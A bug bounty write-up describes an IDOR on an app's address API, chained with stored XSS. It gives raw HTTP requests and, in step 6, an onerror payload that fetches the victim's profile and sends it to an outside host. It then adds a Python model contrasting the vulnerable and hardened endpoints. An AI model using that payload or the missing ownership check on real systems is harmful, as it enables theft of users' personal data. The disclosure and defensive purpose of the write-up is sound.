IDOR: I know where you live

How we got there

This was a bug I found on one of my favourite programs.

Basically, this IDOR was a three-in-one with a caveat:

  • To update your address the app asked you to get in touch with support; I was able to bypass this.
  • The app also had an IDOR that allowed read/write of other users' addresses.
  • The app had XSS in the address fields.

The caveat here was the IDOR: it required that you knew the user's UUID.

  • However, I had asked the program manager whether they would be interested in this by sending a message on a previous report I had submitted.

Reproduction:

  1. Go to dash-sas.xboy.me/address and click on edit; a popup states that you need to get in touch with support if you want to change your info: reach us on 1234 123 0745 or [email protected].
  2. I did some recon and found the address update endpoint sas-api.xboy.me/users/*/
  3. Fetch a user's addresses
GET /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
  4. Add an address to a user
POST /users/<UUID>/addresses HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json

{
  "city": "POC",
  "country": "POC",
  "country_code": "POC",
  "line": "POC",
  "postcode": "POC"
}
  5. Update an address
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json

{
  "city": "POC",
  "country": "POC",
  "country_code": "POC",
  "line": "POC",
  "postcode": "POC"
}
  6. Get XSS
PATCH /users/addresses/<UUID> HTTP/2
Host: sas-api.xboy.me
Authorization: Bearer <REPLACE_ME>
Content-Type: application/json

{
  "city": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "country": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "country_code": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "line": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">",
  "postcode": "<img src=x onerror=\"fetch('https://dash-sas.xboy.me/me/').then(response => response.json()).then(data => {const xhr = new XMLHttpRequest();xhr.open('GET', `https://labs.xboy.me/data?data=${encodeURIComponent(JSON.stringify(data))}`, true);xhr.send();});\">"
}
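The three findings above come down to two server-side mistakes: the address handlers authorize on the UUID in the URL instead of on the owner of the bearer token, and the dashboard renders address fields as raw HTML. The following is an added example, not the program's code: a stdlib-only Python model of the three endpoints (list, add, patch) with a vulnerable variant and a hardened variant side by side. The user IDs ALICE and BOB, the rules in FIELD_RULES, SAMPLE_ADDRESS and XSS_PROBE are all constructed for the illustration and are not from the report.

```python
import html
import re
import uuid

# Constructed sample identifiers (not the program's real UUIDs).
ALICE = "11111111-1111-4111-8111-111111111111"
BOB = "22222222-2222-4222-8222-222222222222"

ADDRESS_FIELDS = ("city", "country", "country_code", "line", "postcode")

# Hypothetical per-field format rules used only by the hardened variant.
FIELD_RULES = {
    "country_code": re.compile(r"[A-Z]{2}"),
    "postcode": re.compile(r"[A-Za-z0-9 -]{1,10}"),
}
MAX_FIELD_LEN = 100

# Constructed test data: Bob's legitimate address and a short XSS probe
# standing in for the much longer onerror payload in the write-up.
SAMPLE_ADDRESS = {"city": "Bobtown", "country": "Nowhere", "country_code": "NW",
                  "line": "1 Main St", "postcode": "NW1 1AA"}
XSS_PROBE = '<img src=x onerror="alert(document.domain)">'


class Forbidden(Exception):
    """Authenticated caller does not own the resource (HTTP 403)."""


class NotFound(Exception):
    """No such address id (HTTP 404)."""


def validate_address(body, strict):
    """Allowlist the JSON keys; in strict mode also enforce length and format."""
    unknown = set(body) - set(ADDRESS_FIELDS)
    if unknown:
        raise ValueError(f"unknown fields: {sorted(unknown)}")
    clean = {}
    for key, value in body.items():
        if not isinstance(value, str):
            raise ValueError(f"{key} must be a string")
        if strict:
            if len(value) > MAX_FIELD_LEN:
                raise ValueError(f"{key} too long")
            rule = FIELD_RULES.get(key)
            if rule and not rule.fullmatch(value):
                raise ValueError(f"{key} has invalid format")
        clean[key] = value
    return clean


class AddressApi:
    """In-memory model of the address endpoints; hardened=False reproduces the bug."""

    def __init__(self, hardened):
        self.hardened = hardened
        self.addresses = {}  # address_id -> {"id", "owner", *ADDRESS_FIELDS}

    def _authorize(self, caller, owner):
        # Vulnerable: trusts whatever UUID is in the path and never compares it
        # with the bearer token's subject. Hardened: caller must be the owner.
        if self.hardened and caller != owner:
            raise Forbidden(f"{caller} may not access resources of {owner}")

    def list_addresses(self, caller, user_id):
        """GET /users/<user_id>/addresses"""
        self._authorize(caller, user_id)
        return [a for a in self.addresses.values() if a["owner"] == user_id]

    def add_address(self, caller, user_id, body):
        """POST /users/<user_id>/addresses"""
        self._authorize(caller, user_id)
        addr = {"id": str(uuid.uuid4()), "owner": user_id}
        addr.update(validate_address(body, strict=self.hardened))
        self.addresses[addr["id"]] = addr
        return addr

    def update_address(self, caller, address_id, body):
        """PATCH /users/addresses/<address_id>: ownership comes from the stored row."""
        addr = self.addresses.get(address_id)
        if addr is None:
            raise NotFound(address_id)
        self._authorize(caller, addr["owner"])
        addr.update(validate_address(body, strict=self.hardened))
        return addr

    def render_address(self, address_id):
        """Dashboard HTML for one address; only the hardened variant encodes output."""
        addr = self.addresses[address_id]
        parts = [addr.get(k, "") for k in ADDRESS_FIELDS]
        if self.hardened:
            parts = [html.escape(p, quote=True) for p in parts]
        return '<div class="address">' + ", ".join(parts) + "</div>"


def run_steps(hardened):
    """Replay the write-up's steps as Alice against Bob's data; return what worked."""
    api = AddressApi(hardened)
    bob_addr = api.add_address(BOB, BOB, dict(SAMPLE_ADDRESS))
    outcome = {}
    try:  # step 3: read another user's addresses
        outcome["cross_user_read"] = len(api.list_addresses(ALICE, BOB)) == 1
    except Forbidden:
        outcome["cross_user_read"] = False
    try:  # step 5: overwrite another user's address
        api.update_address(ALICE, bob_addr["id"], {"city": "POC"})
        outcome["cross_user_write"] = True
    except Forbidden:
        outcome["cross_user_write"] = False
    # Step 6: even the legitimate owner may store markup; output encoding stops it firing.
    api.update_address(BOB, bob_addr["id"], {"line": XSS_PROBE})
    outcome["stored_xss"] = "<img" in api.render_address(bob_addr["id"])
    return outcome
```

The ownership check is the real fix for the IDOR; the path UUID should at most be compared with the token's subject, and an endpoint shaped like /me/addresses removes the parameter altogether. Note that in the hardened variant the owner can still store angle brackets in the free-text fields; the format rules on country_code and postcode shrink the attack surface, but it is the HTML encoding at render time that actually neutralises the stored XSS.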

Report

I sent a report to the program after receiving a go-ahead. It was accepted as a medium because UUID, man.
